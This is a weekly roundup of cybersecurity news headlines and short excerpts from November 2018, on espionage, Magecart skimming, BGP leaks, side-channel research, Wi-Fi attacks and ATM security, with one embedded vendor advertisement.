A Review of the Best News of the Week on Cyber Threats & Defense
China ‘has taken the gloves off’ in its thefts of U.S. technology secrets (LA Times, Nov 18 2018)
It was the great microchip heist — a stunning Chinese-backed effort that pilfered $8.75 billion in secret American technology. But the real secret is it wasn’t unusual. After a lull under President Obama, Chinese economic espionage is soaring again as U.S. relations with Beijing worsen.
Using Airport and Hotel Wi-Fi Is Much Safer Than It Used to Be (Wired, Nov 18 2018)
“What’s in it for the adversary? Why would you choose monkeying with the Wi-Fi at the airport or the hotel over some other attack method? When you look at the profitability and the risk, it just doesn’t make sense other than an amateur to be doing it for giggles.”
America’s Election Grid Remains a Patchwork of Vulnerabilities (The New York Times, Nov 17 2018)
The midterms showed that there aren’t enough qualified poll workers and that accusations of political manipulation persist. Still, the situation has improved since Bush v. Gore.
Compliance is necessary. Wasting money isn’t.
The Mosaic Security Research Market Intelligence Platform provides the tools you need for OWASP’s Cyber Defense Matrix. Build your threat defense systematically.
1 in 5 merchants compromised by Magecart get reinfected (Help Net Security, Nov 13 2018)
Once an operative gains access to a merchant’s server, it is common to litter the site with backdoors and rogue admin account,” he explains. They also use reinfection mechanisms such as database triggers and hidden periodic tasks to reinstate their payload, obfuscation techniques to hide their malicious code, and have begun using zero-day vulnerabilities and exploits to gain a foothold on target sites.
Google and Cloudfare traffic diverted to China… do we need to panic? (Naked Security – Sophos, Nov 13 2018)
A brief outage on Monday diverted traffic to providers such as Google and Cloudflare via China – was it a blunder or a hack?
Google Services Inaccessible Due to BGP Leak (SecurityWeek, Nov 13 2018)
Important Google services were inaccessible for some users on Monday due to a BGP leak that caused traffic to be directed through Russia, China and Nigeria. It’s unclear if the incident was caused by a configuration issue or if it was the result of a malicious attack.
That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards (Krebs on Security, Nov 13 2018)
“If you own a domain name that gets decent traffic and you fail to pay its annual renewal fee, chances are this mistake will be costly for you and for others. Lately, neglected domains have been getting scooped up by crooks who use them to set up fake e-commerce sites that steal credit card details from unwary shoppers.”
Spectre, Meltdown researchers unveil 7 more speculative execution attacks (Ars Technica, Nov 13 2018)
Seven new possible attacks. Some are mitigated by known mitigation techniques, but others are not. That means further work is required to safeguard vulnerable systems.
Cranes Exposed to Possible Cyber-Sabotage—What We Can Learn (Infosecurity Magazine, Nov 14 2018)
Why the scenario of a hacked crane is a concern for wider cybersecurity.
Suspected Russian Hackers Impersonate State Department Aide (SecurityWeek, Nov 17 2018)
The “spear phishing” attempts began on Wednesday, sending e-mail messages purported to come from a department public affairs official.
Understanding Evil Twin AP Attacks and How to Prevent Them (Dark Reading, Nov 14 2018)
The attack surface remains largely unprotected from Wi-Fi threats that can result in stolen credentials and sensitive information as well as backdoor/malware payload drops.
Worst-Case Thinking Breeds Fear and Irrationality (Schneier on Security, Nov 18 2018)
Basically, someone sees a man and a little girl leaving a shopping center. Instead of thinking “it must be a father and daughter, which happens millions of times a day and is perfectly normal,” he thinks “this is obviously a case of child abduction and I must alert the authorities immediately.”…And they do, scrambling helicopters, searching cars leaving the shopping center, and going door-to-door looking for clues. Seven hours later, the police eventually came to realize that she was safe asleep in bed.
Sophisticated Campaign Targets Pakistan’s Air Force (Dark Reading, Nov 13 2018)
Espionage campaign uses a variety of new evasion techniques.
Comprehensive Guide on Hydra – A Brute Forcing Tool (Hacking Articles, Nov 13 2018)
Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.
GPUs are vulnerable to side-channel attacks (Network World Security, Nov 13 2018)
Researchers at UCLA Riverside discover GPUs can be victims of the same kinds of attacks as Meltdown and Spectre, which have impacted Intel and AMD CPUs.
Chinese Hackers Target UK Engineering Company: Report (SecurityWeek, Nov 14 2018)
Recent attacks on an engineering company in the United Kingdom were attributed to a China-related cyber-espionage group despite the use of techniques usually associated with Russian threat actors.
Dridex/Locky Operators Unleash New Malware in Recent Attack (SecurityWeek, Nov 15 2018)
The malware was picked up by TA505 last month and used in an attack on October 11, as part of an email campaign that used both Microsoft Word and Microsoft Publisher files for distribution purposes. The attack targeted users at commercial banking institutions.
DHS Task Force Moves Forward on Playbooks for Supply Chain Security (Dark Reading, Nov 16 2018)
Last week, the task force’s executive committee met for the first time as it started on the road to producing those DHS playbooks for both government and industry.
Many ATMs Can be Hacked in Minutes: Report (SecurityWeek, Nov 16 2018)
Many automated teller machines (ATMs) lack adequate security mechanisms and can be compromised in minutes using various methods, according to a new report from vulnerability assessment firm Positive Technologies.
Hackers Earn $1 Million for Zero-Day Exploits at Chinese Competition (SecurityWeek, Nov 19 2018)
White hat hackers earned more than $1 million for exploits disclosed at the Tianfu Cup PWN hacking competition that took place on November 16-17 in Chengdu, the capital of China’s Sichuan province.